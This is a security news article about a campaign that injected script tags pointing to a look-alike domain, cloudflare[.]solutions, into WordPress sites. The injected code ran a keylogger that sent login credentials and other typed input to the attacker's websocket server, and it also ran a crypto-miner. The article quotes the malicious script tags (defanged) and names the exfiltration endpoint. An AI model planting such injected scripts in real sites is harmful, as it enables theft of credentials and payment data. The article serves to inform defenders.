New research revealed that more than 5,000 WordPress websites are running along with keylogger and also it’s trying to running crypto-miner in the browser while browsing the infected website.
Recent days WordPress websites displaying unwanted banners at the bottom of the page which appears 15 seconds after browsing the website due to injecting the Cloudflare[.]solutions Scripts in function.php. that does not belong to Cloudflare.
<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'></script> <script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>
It used to load this malicious script every time admin pannel logged in both front end and backend.
Also Read: WordPress 4.8.3 released with patch for SQL injection (SQLi) which affected all the previous version
In this case, the second script contains cors.js which is injected in an encoded format and once it decoded we can see that there are a two cdnjs.cloudflare.com URLs with long hexadecimal parameters:
A domain name seems to be original Cloudfare URL but when we come down analyzing the https://cdnjs.cloudflare.com/ajax/libs/linter/linter.js ,it contains linterkey variables.
Further, analyze revealed that linter.js contains a real Payload in hexadecimal numbers after the question mark in the URLs.
According to sucuri, This script adds a handler to every input field on the websites to send its value to the attacker (wss://cloudflare[.]solutions:8085/) when a user leaves that field.
This Payload has capable of performing the keylogging activities each and every time admin logging on their WordPress website.
Here using this WordPress Keylogger, both the username and the password were sent to the cloudflare[.]solutions server even before a user clicks on the “Login” button.
The Same portion of this first attack and the second attack took place in April and November month and this is the latest scenario that is capable these stately keylogging futures.
The worst part is if this flow has successfully executed in e-commerce based WordPress website then the hacker can able to access the payment related information.
Also Read: Most Important Considerations Check to Setup Your WordPress Security
Phishing attackers used Google Docs to deliver malicious links, bypassing security measures and redirecting victims…
The Python-based NodeStealer, a sophisticated info-stealer, has evolved to target new information and employ advanced…
A significant XSS vulnerability was recently uncovered in Microsoft’s Bing.com, potentially allowing attackers to execute…
Meta has announced the removal of over 2 million accounts connected to malicious activities, including…
Critical security vulnerability has been identified in Veritas Enterprise Vault, a widely-used archiving and content…
A critical security vulnerability has been disclosed in the popular file archiving tool 7-Zip, allowing…